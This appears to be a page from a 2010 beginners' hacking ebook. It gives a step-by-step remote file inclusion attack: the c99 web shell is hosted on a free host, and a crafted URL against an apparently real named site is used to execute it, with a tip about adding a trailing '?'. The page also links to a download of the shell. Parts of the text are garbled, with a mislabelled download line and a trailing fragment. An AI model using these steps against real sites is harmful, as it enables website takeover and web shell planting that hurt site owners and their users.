Hacking For Beginners – Manthan Desai

2010

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I woulduse c99 shell.

“Download ‘Internet Download manager’ from here: http://www.hackingtech.co.tv/RFI/c99shell.zip “.

”The hacker would first upload the shells to a web hosting site such as ripway.com, 110mb.com etc.Now here is how a hacker would execute the shells to gain access. Let’s say that the URL of the shell is

http://h1.ripway.com/ yourdomain /c99.txt

Now here is how a hacker would execute the following command to gain access

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/ yourdomain /c99.txt?

Remember to add " ? ” at the end of url or else the shell will not execute. Now the hacker is inside website and hecould do anything with it

any website listed here and try to

www.hackingtech.co.tv

Page 206